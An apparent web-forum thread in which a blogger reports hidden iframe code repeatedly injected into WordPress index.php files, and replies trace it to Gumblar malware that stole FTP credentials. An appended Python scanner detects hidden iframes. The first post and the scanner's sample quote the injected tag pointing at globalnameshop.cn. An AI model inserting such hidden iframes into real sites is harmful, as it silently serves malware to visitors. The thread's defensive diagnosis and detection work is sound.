Hidden iFrame injection?? (6 posts)

  1. Brad_Isaac
    Member
    Posted 5 months ago #

    Hi,

    A few weeks ago, I found that someone had injected hidden iframe code into my headers. I immediately backed up the blog and restored it from backup. Then I changed all my passwords.

    This morning, it appears the same person ran the same injection routine that changed all my index.php files to point to their rogue site (<iframe src="http://globalnameshop.cn:8080/index.php" width=126 height=148 style="visibility: hidden"></iframe>).

    My site is http://www.persistenceunlimited.com

    How are they doing this? I've run the hardening utilities and checked all settings, but can't find how they are doing this.

    Thanks,
    Brad

  2. ClaytonJames
    Member
    Posted 5 months ago #

    Assuming that you are already sure that you have no issues with passwords/ftp/admin account compromises, you may want to examine your plugins for any "known" injection vulnerabilities first. I'm not sure how many of the 46 plugins that are on that site are actually being/been used, but perhaps there is something there that might be helpful. Have you had the opportunity to review the log files for the days preceding/surrounding the noticed code injections?

  3. Shane G
    Member
    Posted 5 months ago #

    Hi,

    If you are installing and uninstalling through Fantastico, then it may be possible that iframe code can be added automatically inside the index page of the blog.

    Also use the latest version and non-vulnerable plugins in your blog, and uninstall all unwanted plugins.

    Thanks,

    Shane G.

  4. usef_ksa
    Member
    Posted 5 months ago #

    Hi,
    Also, I have the same problem. Please, if you find a solution, kindly let us know.
    I am trying to solve this problem.

  5. Brad_Isaac
    Member
    Posted 5 months ago #

    Thank you, I disabled a lot of the plugins, but maybe I should delete them from the server. PS: which log files do you recommend I check out? I don't think I've found any as of yet.

    Thanks again

  6. whooami
    Member
    Posted 5 months ago #

    ...he's talking about your server logs and your FTP log.

    ...if you're not using a plugin, you ought to delete it.

    Finally, if you Google that domain, globalnameshop.cn, you'll find it's tied to Gumblar.

    If you did ANY further looking, you would have read that sites that are hit by Gumblar are a result of malware on one's local machine.

    Your FTP credentials were sent off to Estonia, or Latvia, or Russia, or China, or some other super friendly country.

    Said FTP credentials were used to log in to your site (by other zombie computers), make changes, and ultimately propagate more Gumblar infections.

    You can verify this by looking at your FTP log, assuming your host has those available.

    Unless and until you clean the malware off the offending computer(s) and change your FTP password, you can expect to be hacked again.

    Not to mention the fact that your computer just became a zombie in a botnet.

    Freaked out? Good -- go here:

    http://www.malwarebytes.org/

    Download their software and use it.
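An added scanner (not code from any poster in this thread) for checking a web root for the injection pattern quoted in the first post: iframes hidden by CSS or sized down to a pixel, with the off-site host they point at reported alongside. The site hostname, the file extensions scanned and the sample file contents are assumptions constructed for the example.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample of an injected theme file, built from the iframe quoted in the thread.
SAMPLE_INJECTED = ('<?php get_header(); ?>\n<iframe src="http://globalnameshop.cn:8080/index.php" '
                   'width=126 height=148 style="visibility: hidden"></iframe>\n')
# Constructed sample of a normal, visible embed, which must not be flagged.
SAMPLE_CLEAN = ('<?php get_header(); ?>\n'
                '<iframe src="https://player.example.com/v/1" width="560" height="315"></iframe>\n')

IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
HIDDEN_RE = re.compile(r'visibility\s*:\s*hidden|display\s*:\s*none', re.IGNORECASE)
SIZE_RE = re.compile(r'\b(?:width|height)\s*=\s*["\']?(\d+)', re.IGNORECASE)


def suspicious_iframes(html, site_host):
    """Return [(src, reasons)] for iframes hidden by CSS or sized to a pixel or less."""
    findings = []
    for tag in IFRAME_RE.findall(html):
        m = SRC_RE.search(tag)
        src = m.group(1) if m else ''
        reasons = []
        if HIDDEN_RE.search(tag):
            reasons.append('hidden via CSS')
        if any(int(v) <= 1 for v in SIZE_RE.findall(tag)):
            reasons.append('zero/one-pixel size')
        if not reasons:
            continue  # visible, normally sized iframe: not the pattern described here
        host = urlparse(src).hostname or site_host  # a relative src stays on the same host
        if host != site_host:
            reasons.append('off-site src ' + host)
        findings.append((src, reasons))
    return findings


def scan_tree(root, site_host, exts=('.php', '.html', '.htm', '.js')):
    """Walk a web root and list every file containing a suspicious iframe."""
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                hits = suspicious_iframes(fh.read(), site_host)
            if hits:
                report.append((path, hits))
    return report
```

Run `scan_tree('/path/to/webroot', 'www.example.com')` against a copy of the site; a hit in every index.php, as described in the first post, points at a file-level (FTP) change rather than a single plugin bug.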
